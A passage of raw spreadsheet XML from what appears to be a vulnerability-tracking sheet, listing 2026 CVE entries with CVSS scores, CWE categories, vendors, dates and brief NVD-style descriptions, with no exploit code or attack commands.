t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P867" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q867" s="5" t="inlineStr" /><c r="R867" s="5" t="inlineStr"><is><t>CWE-617</t></is></c><c r="S867" s="5" t="inlineStr"><is><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is></c><c r="T867" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82052</t></is></c></row><row r="868"><c r="A868" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B868" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C868" s="5" t="inlineStr"><is><t>CVE-2026-82054</t></is></c><c r="D868" s="5" t="n"><v>7.1</v></c><c r="E868" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F868" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G868" s="5" t="inlineStr" /><c r="H868" s="5" t="n"><v>0.003</v></c><c r="I868" s="5" t="inlineStr" /><c r="J868" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K868" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L868" s="5" t="inlineStr" /><c r="M868" s="5" t="inlineStr" /><c r="N868" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O868" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P868" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q868" s="5" t="inlineStr" /><c r="R868" s="5" t="inlineStr"><is><t>CWE-770</t></is></c><c r="S868" s="5" t="inlineStr"><is><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is></c><c r="T868" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82054</t></is></c></row><row r="869"><c r="A869" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B869" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C869" s="5" t="inlineStr"><is><t>CVE-2026-82055</t></is></c><c r="D869" s="5" t="n"><v>7.1</v></c><c r="E869" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F869" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G869" s="5" t="inlineStr" /><c r="H869" s="5" t="n"><v>0.003</v></c><c r="I869" s="5" t="inlineStr" /><c r="J869" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K869" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L869" s="5" t="inlineStr" /><c r="M869" s="5" t="inlineStr" /><c r="N869" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O869" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P869" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q869" s="5" t="inlineStr" /><c r="R869" s="5" t="inlineStr"><is><t>CWE-476</t></is></c><c r="S869" s="5" t="inlineStr"><is><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is></c><c r="T869" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82055</t></is></c></row><row r="870"><c r="A870" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B870" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C870" s="5" t="inlineStr"><is><t>CVE-2026-82057</t></is></c><c r="D870" s="5" t="n"><v>7.1</v></c><c r="E870" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F870" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G870" s="5" t="inlineStr" /><c r="H870" s="5" t="n"><v>0.003</v></c><c r="I870" s="5" t="inlineStr" /><c r="J870" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K870" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L870" s="5" t="inlineStr" /><c r="M870" s="5" t="inlineStr" /><c r="N870" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O870" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P870" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q870" s="5" t="inlineStr" /><c r="R870" s="5" t="inlineStr"><is><t>CWE-843</t></is></c><c r="S870" s="5" t="inlineStr"><is><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is></c><c r="T870" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82057</t></is></c></row><row r="871"><c r="A871" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B871" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C871" s="5" t="inlineStr"><is><t>CVE-2026-82058</t></is></c><c r="D871" s="5" t="n"><v>7.1</v></c><c r="E871" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F871" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G871" s="5" t="inlineStr" /><c r="H871" s="5" t="n"><v>0.003</v></c><c r="I871" s="5" t="inlineStr" /><c r="J871" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K871" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L871" s="5" t="inlineStr" /><c r="M871" s="5" t="inlineStr" /><c r="N871" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O871" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P871" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q871" s="5" t="inlineStr" /><c r="R871" s="5" t="inlineStr"><is><t>CWE-248</t></is></c><c r="S871" s="5" t="inlineStr"><is><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is></c><c r="T871" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82058</t></is></c></row><row r="872"><c r="A872" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B872" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C872" s="5" t="inlineStr"><is><t>CVE-2026-82065</t></is></c><c r="D872" s="5" t="n"><v>7.1</v></c><c r="E872" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F872" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G872" s="5" t="inlineStr" /><c r="H872" s="5" t="n"><v>0.003</v></c><c r="I872" s="5" t="inlineStr" /><c r="J872" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K872" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L872" s="5" t="inlineStr" /><c r="M872" s="5" t="inlineStr" /><c r="N872" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O872" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P872" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q872" s="5" t="inlineStr" /><c r="R872" s="5" t="inlineStr"><is><t>CWE-617</t></is></c><c r="S872" s="5" t="inlineStr"><is><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is></c><c r="T872" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82065</t></is></c></row><row r="873"><c r="A873" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B873" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C873" s="5" t="inlineStr"><is><t>CVE-2026-82068</t></is></c><c r="D873" s="5" t="n"><v>7.1</v></c><c r="E873" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F873" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G873" s="5" t="inlineStr" /><c r="H873" s="5" t="n"><v>0.003</v></c><c r="I873" s="5" t="inlineStr" /><c r="J873" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K873" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L873" s="5" t="inlineStr" /><c r="M873" s="5" t="inlineStr" /><c r="N873" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O873" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P873" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q873" s="5" t="inlineStr" /><c r="R873" s="5" t="inlineStr"><is><t>CWE-617</t></is></c><c r="S873" s="5" t="inlineStr"><is><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is></c><c r="T873" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82068</t></is></c></row><row r="874"><c r="A874" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B874" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C874" s="5" t="inlineStr"><is><t>CVE-2026-82070</t></is></c><c r="D874" s="5" t="n"><v>7.1</v></c><c r="E874" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F874" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G874" s="5" t="inlineStr" /><c r="H874" s="5" t="n"><v>0.002</v></c><c r="I874" s="5" t="inlineStr" /><c r="J874" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K874" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L874" s="5" t="inlineStr" /><c r="M874" s="5" t="inlineStr" /><c r="N874" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O874" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P874" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q874" s="5" t="inlineStr" /><c r="R874" s="5" t="inlineStr"><is><t>CWE-522</t></is></c><c r="S874" s="5" t="inlineStr"><is><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is></c><c r="T874" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82070</t></is></c></row><row r="875"><c r="A875" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B875" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C875" s="5" t="inlineStr"><is><t>CVE-2026-82073</t></is></c><c r="D875" s="5" t="n"><v>7.1</v></c><c r="E875" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F875" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G875" s="5" t="inlineStr" /><c r="H875" s="5" t="n"><v>0.003</v></c><c r="I875" s="5" t="inlineStr" /><c r="J875" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K875" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L875" s="5" t="inlineStr" /><c r="M875" s="5" t="inlineStr" /><c r="N875" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O875" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P875" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q875" s="5" t="inlineStr" /><c r="R875" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S875" s="5" t="inlineStr"><is><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is></c><c r="T875" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82073</t></is></c></row><row r="876"><c r="A876" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B876" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C876" s="5" t="inlineStr"><is><t>CVE-2026-82074</t></is></c><c r="D876" s="5" t="n"><v>7.1</v></c><c r="E876" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F876" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G876" s="5" t="inlineStr" /><c r="H876" s="5" t="n"><v>0.002</v></c><c r="I876" s="5" t="inlineStr" /><c r="J876" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K876" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L876" s="5" t="inlineStr" /><c r="M876" s="5" t="inlineStr" /><c r="N876" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O876" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P876" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q876" s="5" t="inlineStr" /><c r="R876" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S876" s="5" t="inlineStr"><is><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is></c><c r="T876" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82074</t></is></c></row><row r="877"><c r="A877" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B877" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C877" s="5" t="inlineStr"><is><t>CVE-2026-82076</t></is></c><c r="D877" s="5" t="n"><v>7.1</v></c><c r="E877" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F877" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G877" s="5" t="inlineStr" /><c r="H877" s="5" t="n"><v>0.003</v></c><c r="I877" s="5" t="inlineStr" /><c r="J877" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K877" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L877" s="5" t="inlineStr" /><c r="M877" s="5" t="inlineStr" /><c r="N877" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O877" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P877" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q877" s="5" t="inlineStr" /><c r="R877" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S877" s="5" t="inlineStr"><is><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is></c><c r="T877" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82076</t></is></c></row><row r="878"><c r="A878" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B878" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C878" s="5" t="inlineStr"><is><t>CVE-2026-84817</t></is></c><c r="D878" s="5" t="n"><v>7.1</v></c><c r="E878" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F878" s="5" t="inlineStr"><is><t>audit@patchstack.com</t></is></c><c r="G878" s="5" t="inlineStr" /><c r="H878" s="5" t="n"><v>0.001</v></c><c r="I878" s="5" t="inlineStr" /><c r="J878" s="5" t="inlineStr" /><c r="K878" s="5" t="inlineStr" /><c r="L878" s="5" t="inlineStr" /><c r="M878" s="5" t="inlineStr" /><c r="N878" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O878" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P878" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q878" s="5" t="inlineStr" /><c r="R878" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S878" s="5" t="inlineStr"><is><t>Unauthenticated Cross Site Scripting (XSS) in JetFormBuilder &lt;= 3.6.5.1 versions.</t></is></c><c r="T878" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84817</t></is></c></row><row r="879"><c r="A879" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B879" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C879" s="5" t="inlineStr"><is><t>CVE-2026-84818</t></is></c><c r="D879" s="5" t="n"><v>7.1</v></c><c r="E879" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F879" s="5" t="inlineStr"><is><t>audit@patchstack.com</t></is></c><c r="G879" s="5" t="inlineStr" /><c r="H879" s="5" t="n"><v>0.001</v></c><c r="I879" s="5" t="inlineStr" /><c r="J879" s="5" t="inlineStr" /><c r="K879" s="5" t="inlineStr" /><c r="L879" s="5" t="inlineStr" /><c r="M879" s="5" t="inlineStr" /><c r="N879" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O879" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P879" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q879" s="5" t="inlineStr" /><c r="R879" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S879" s="5" t="inlineStr"><is><t>Unauthenticated Cross Site Scripting (XSS) in Open User Map &lt;= 1.4.50 versions.</t></is></c><c r="T879" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84818</t></is></c></row><row r="880"><c r="A880" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B880" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C880" s="5" t="inlineStr"><is><t>CVE-2026-84820</t></is></c><c r="D880" s="5" t="n"><v>7.1</v></c><c r="E880" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F880" s="5" t="inlineStr"><is><t>audit@patchstack.com</t></is></c><c r="G880" s="5" t="inlineStr" /><c r="H880" s="5" t="n"><v>0.001</v></c><c r="I880" s="5" t="inlineStr" /><c r="J880" s="5" t="inlineStr" /><c r="K880" s="5" t="inlineStr" /><c r="L880" s="5" t="inlineStr" /><c r="M880" s="5" t="inlineStr" /><c r="N880" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O880" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P880" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q880" s="5" t="inlineStr" /><c r="R880" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S880" s="5" t="inlineStr"><is><t>Unauthenticated Cross Site Scripting (XSS) in Unlimited Elements For Elementor (Free Widgets, Addons, Templates) &lt;= 2.0.17 versions.</t></is></c><c r="T880" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84820</t></is></c></row><row r="881"><c r="A881" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B881" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C881" s="5" t="inlineStr"><is><t>CVE-2026-86074</t></is></c><c r="D881" s="5" t="n"><v>7.1</v></c><c r="E881" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F881" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G881" s="5" t="inlineStr" /><c r="H881" s="5" t="n"><v>0.003</v></c><c r="I881" s="5" t="inlineStr" /><c r="J881" s="5" t="inlineStr" /><c r="K881" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L881" s="5" t="inlineStr" /><c r="M881" s="5" t="inlineStr" /><c r="N881" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O881" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P881" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q881" s="5" t="inlineStr" /><c r="R881" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="S881" s="5" t="inlineStr"><is><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is></c><c r="T881" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86074</t></is></c></row><row r="882"><c r="A882" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B882" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C882" s="5" t="inlineStr"><is><t>CVE-2026-86081</t></is></c><c r="D882" s="5" t="n"><v>7.1</v></c><c r="E882" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F882" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G882" s="5" t="inlineStr" /><c r="H882" s="5" t="n"><v>0.003</v></c><c r="I882" s="5" t="inlineStr" /><c r="J882" s="5" t="inlineStr" /><c r="K882" s="5" t="inlineStr" /><c r="L882" s="5" t="inlineStr" /><c r="M882" s="5" t="inlineStr" /><c r="N882" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O882" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P882" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q882" s="5" t="inlineStr" /><c r="R882" s="5" t="inlineStr"><is><t>CWE-1333</t></is></c><c r="S882" s="5" t="inlineStr"><is><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is></c><c r="T882" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86081</t></is></c></row><row r="883"><c r="A883" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B883" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C883" s="5" t="inlineStr"><is><t>CVE-2026-86713</t></is></c><c r="D883" s="5" t="n"><v>7.1</v></c><c r="E883" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F883" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G883" s="5" t="inlineStr" /><c r="H883" s="5" t="n"><v>0.004</v></c><c r="I883" s="5" t="inlineStr" /><c r="J883" s="5" t="inlineStr" /><c r="K883" s="5" t="inlineStr" /><c r="L883" s="5" t="inlineStr" /><c r="M883" s="5" t="inlineStr" /><c r="N883" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O883" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P883" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q883" s="5" t="inlineStr" /><c r="R883" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S883" s="5" t="inlineStr"><is><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is></c><c r="T883" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86713</t></is></c></row><row r="884"><c r="A884" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B884" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C884" s="5" t="inlineStr"><is><t>CVE-2026-86718</t></is></c><c r="D884" s="5" t="n"><v>7.1</v></c><c r="E884" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F884" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G884" s="5" t="inlineStr" /><c r="H884" s="5" t="n"><v>0.002</v></c><c r="I884" s="5" t="inlineStr" /><c r="J884" s="5" t="inlineStr" /><c r="K884" s="5" t="inlineStr" /><c r="L884" s="5" t="inlineStr" /><c r="M884" s="5" t="inlineStr" /><c r="N884" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O884" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P884" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q884" s="5" t="inlineStr" /><c r="R884" s="5" t="inlineStr"><is><t>CWE-352</t></is></c><c r="S884" s="5" t="inlineStr"><is><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is></c><c r="T884" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86718</t></is></c></row><row r="885"><c r="A885" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B885" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C885" s="5" t="inlineStr"><is><t>CVE-2026-86724</t></is></c><c r="D885" s="5" t="n"><v>7.1</v></c><c r="E885" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F885" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G885" s="5" t="inlineStr" /><c r="H885" s="5" t="n"><v>0.001</v></c><c r="I885" s="5" t="inlineStr" /><c r="J885" s="5" t="inlineStr" /><c r="K885" s="5" t="inlineStr" /><c r="L885" s="5" t="inlineStr" /><c r="M885" s="5" t="inlineStr" /><c r="N885" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O885" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P885" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q885" s="5" t="inlineStr" /><c r="R885" s="5" t="inlineStr"><is><t>CWE-352</t></is></c><c r="S885" s="5" t="inlineStr"><is><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is></c><c r="T885" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86724</t></is></c></row><row r="886"><c r="A886" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B886" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C886" s="5" t="inlineStr"><is><t>CVE-2026-86725</t></is></c><c r="D886" s="5" t="n"><v>7.1</v></c><c r="E886" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F886" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G886" s="5" t="inlineStr" /><c r="H886" s="5" t="n"><v>0.003</v></c><c r="I886" s="5" t="inlineStr" /><c r="J886" s="5" t="inlineStr" /><c r="K886" s="5" t="inlineStr" /><c r="L886" s="5" t="inlineStr" /><c r="M886" s="5" t="inlineStr" /><c r="N886" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O886" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P886" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q886" s="5" t="inlineStr" /><c r="R886" s="5" t="inlineStr"><is><t>CWE-639</t></is></c><c r="S886" s="5" t="inlineStr"><is><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is></c><c r="T886" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86725</t></is></c></row><row r="887"><c r="A887" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B887" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C887" s="5" t="inlineStr"><is><t>CVE-2026-86734</t></is></c><c r="D887" s="5" t="n"><v>7.1</v></c><c r="E887" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F887" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G887" s="5" t="inlineStr" /><c r="H887" s="5" t="n"><v>0.003</v></c><c r="I887" s="5" t="inlineStr" /><c r="J887" s="5" t="inlineStr" /><c r="K887" s="5" t="inlineStr"><is><t>snipeitapp:snipe-it</t></is></c><c r="L887" s="5" t="inlineStr" /><c r="M887" s="5" t="inlineStr" /><c r="N887" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O887" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P887" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q887" s="5" t="inlineStr" /><c r="R887" s="5" t="inlineStr"><is><t>CWE-400</t></is></c><c r="S887" s="5" t="inlineStr"><is><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is></c><c r="T887" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86734</t></is></c></row><row r="888"><c r="A888" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B888" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C888" s="5" t="inlineStr"><is><t>CVE-2026-9331</t></is></c><c r="D888" s="5" t="n"><v>7.1</v></c><c r="E888" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F888" s="5" t="inlineStr"><is><t>security@wordfence.com</t></is></c><c r="G888" s="5" t="inlineStr" /><c r="H888" s="5" t="n"><v>0.002</v></c><c r="I888" s="5" t="inlineStr" /><c r="J888" s="5" t="inlineStr" /><c r="K888" s="5" t="inlineStr" /><c r="L888" s="5" t="inlineStr" /><c r="M888" s="5" t="inlineStr" /><c r="N888" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O888" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P888" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q888" s="5" t="inlineStr" /><c r="R888" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S888" s="5" t="inlineStr"><is><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is></c><c r="T888" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-9331</t></is></c></row><row r="889"><c r="A889" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B889" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C889" s="5" t="inlineStr"><is><t>CVE-2026-50349</t></is></c><c r="D889" s="5" t="n"><v>7</v></c><c r="E889" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F889" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G889" s="5" t="inlineStr" /><c r="H889" s="5" t="n"><v>0.002</v></c><c r="I889" s="5" t="inlineStr" /><c r="J889" s="5" t="inlineStr" /><c r="K889" s="5" t="inlineStr" /><c r="L889" s="5" t="inlineStr" /><c r="M889" s="5" t="inlineStr" /><c r="N889" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O889" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P889" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q889" s="5" t="inlineStr" /><c r="R889" s="5" t="inlineStr"><is><t>CWE-362, CWE-416</t></is></c><c r="S889" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Ancillary Function Driver for WinSock allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T889" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-50349</t></is></c></row><row r="890"><c r="A890" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B890" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C890" s="5" t="inlineStr"><is><t>CVE-2026-58848</t></is></c><c r="D890" s="5" t="n"><v>7</v></c><c r="E890" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F890" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G890" s="5" t="inlineStr" /><c r="H890" s="5" t="n"><v>0.001</v></c><c r="I890" s="5" t="inlineStr" /><c r="J890" s="5" t="inlineStr" /><c r="K890" s="5" t="inlineStr" /><c r="L890" s="5" t="inlineStr" /><c r="M890" s="5" t="inlineStr" /><c r="N890" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O890" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P890" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q890" s="5" t="inlineStr" /><c r="R890" s="5" t="inlineStr"><is><t>CWE-362</t></is></c><c r="S890" s="5" t="inlineStr"><is><t>In multiple functions of alloc.c, there is a possible unauthorized read/write access due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T890" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58848</t></is></c></row><row r="891"><c r="A891" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B891" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C891" s="5" t="inlineStr"><is><t>CVE-2026-62653</t></is></c><c r="D891" s="5" t="n"><v>7</v></c><c r="E891" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F891" s="5" t="inlineStr"><is><t>productcert@siemens.com</t></is></c><c r="G891" s="5" t="inlineStr" /><c r="H891" 